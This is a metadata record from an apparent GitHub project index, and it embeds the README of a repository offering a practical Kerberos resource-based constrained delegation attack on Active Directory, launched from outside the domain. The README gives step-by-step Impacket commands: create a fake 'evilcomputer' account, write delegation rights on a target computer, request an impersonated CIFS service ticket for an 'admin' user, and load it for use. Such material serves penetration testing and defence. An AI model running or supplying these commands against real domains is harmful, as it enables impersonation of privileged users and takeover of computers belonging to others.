{"id":13845848,"url":"https://github.com/tothi/rbcd-attack","last_synced_at":"2025-07-12T03:32:30.312Z","repository":{"id":44353634,"uuid":"260522231","full_name":"tothi/rbcd-attack","owner":"tothi","description":"Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket","archived":false,"fork":false,"pushed_at":"2022-07-16T21:32:10.000Z","size":284,"stargazers_count":487,"open_issues_count":0,"forks_count":62,"subscribers_count":16,"default_branch":"master","last_synced_at":"2024-08-05T17:45:12.321Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tothi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-05-01T17:48:48.000Z","updated_at":"2024-07-24T11:52:34.000Z","dependencies_parsed_at":"2022-07-19T14:39:15.440Z","dependency_job_id":null,"html_url":"https://github.com/tothi/rbcd-attack","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tothi%2Frbcd-attack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tothi%2Frbcd-attack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tothi%2Frbcd-attack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tothi%2Frbcd-attack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tothi","download_url":"https://codeload.github.com/tothi/rbcd-attack/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225791420,"owners_count":17524779,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:03:38.288Z","updated_at":"2024-11-21T19:30:45.546Z","avatar_url":"https://github.com/tothi.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# Abusing Kerberos Resource-Based Constrained Delegation\n\n## TL;DR\n\nThis repo is about a practical attack against Kerberos Resource-Based\nConstrained Delegation in a Windows Active Directory Domain.\n\n\u003e The difference from other common implementations is that we are\n\u003e launching the attack **from outside of the Windows Domain**, not from\n\u003e a domain joined (usually Windows) computer.\n\nThe attack is implemented **using only Python3\n[Impacket](https://www.secureauth.com/labs/open-source-tools/impacket)**\n(and its dependencies). Tested on [Arch](https://www.archlinux.org/)\nwith up-to-date Impacket (0.9.21 as of writing).\n\n![Attack Log](./rbcd-attack.png)\n\n## The Attack\n\nIn summary, without any deep details, the attack targets \na domain computer, exactly service principals related to the\ntarget domain computer.\n\nWhat we need here as prerequisites:\n\n* a domain account with write access to the target computer (exactly write access to the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer domain object)\n* permission to create new computer accounts (this is usually default, see `MachineAccountQuota`)\n* LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) access to the DC.\n* Kerberos (88/tcp) access to the DC\n\nThe attack path in very high level:\n\n1. Create a fake computer\n2. Abuse `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target\n3. Request impersonated Service Tickets (S4U) for the target computer\n\nBenefit:\n\n* Impersonated Service Tickets may allow high-level access to services on\nthe target like CIFS, HTTP, etc, if the impersonated account has privileges.\nSometimes takeover of the computer.\n\n## Common toolsets\n\nThe common toolsets for this attack operate on a domain-joined\nWindows Computer using:\n\n* [Powermad](https://github.com/Kevin-Robertson/Powermad) for adding new computer accounts\n* [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) from [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) dev branch for `abusing msDS-AllowedToActOnBehalfOfOtherIdentity`\n* [Rubeus](https://github.com/GhostPack/Rubeus) for S4U ticket operations\n\n## Impacket implementation\n\nThis implementation uses pure [Impacket](https://github.com/SecureAuthCorp/impacket) from outside the Domain.\n\n### Creating the fake computer\n\nUsing addcomputer.py example from Impacket let's create a fake computer (called `evilcomputer`):\n\n```\naddcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0\n```\n\n### Modifying delegation rights\n\nImplemented the script [rbcd.py](./rbcd.py) found here in the repo which\nadds the related security descriptor of the newly created EVILCOMPUTER to the\n`msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer.\n\n```\n./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\\\test:ohW9Lie0\n```\n\nThe script uses heavily the Python classes in the `ntlmrelayx.py` Impacket example.\nFor help and an example call the script without options.\n\n### Getting the impersonated service ticket\n\nNow everything is ready for abusing the Constrained Delegation by an\nS4U2Self query and get an impersonated Service Ticket for the\ntarget computer. With `getST.py` Impacket example script:\n\n```\ngetST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS\n```\n\nThe above command fetches a CIFS Service Ticket on behalf of the targetted domain user `admin`\nand stores it in the file `admin.ccache`.\n\nAfter adding the file path to the KRB5CCNAME variable the ticket is usable for\nKerberos clients.\n\n```\nexport KRB5CCNAME=`pwd`/admin.ccache\nklist\n```\n\n## References\n\nFor details about abusing Resource-Based Constrained Delegation:\n\n* https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html\n* https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/\n* http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/\n\nAnd one of the most comprehensive presentations about Kerberos Attacks:\n\n* [Constructing Kerberos Attacks with Delegation Primitives slides](https://shenaniganslabs.io/media/Constructing%20Kerberos%20Attacks%20with%20Delegation%20Primitives.pdf) at Defcon by [Elad Shamir](https://twitter.com/elad_shamir) and [Matt Bush](https://twitter.com/3xocyte)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftothi%2Frbcd-attack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftothi%2Frbcd-attack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftothi%2Frbcd-attack/lists"}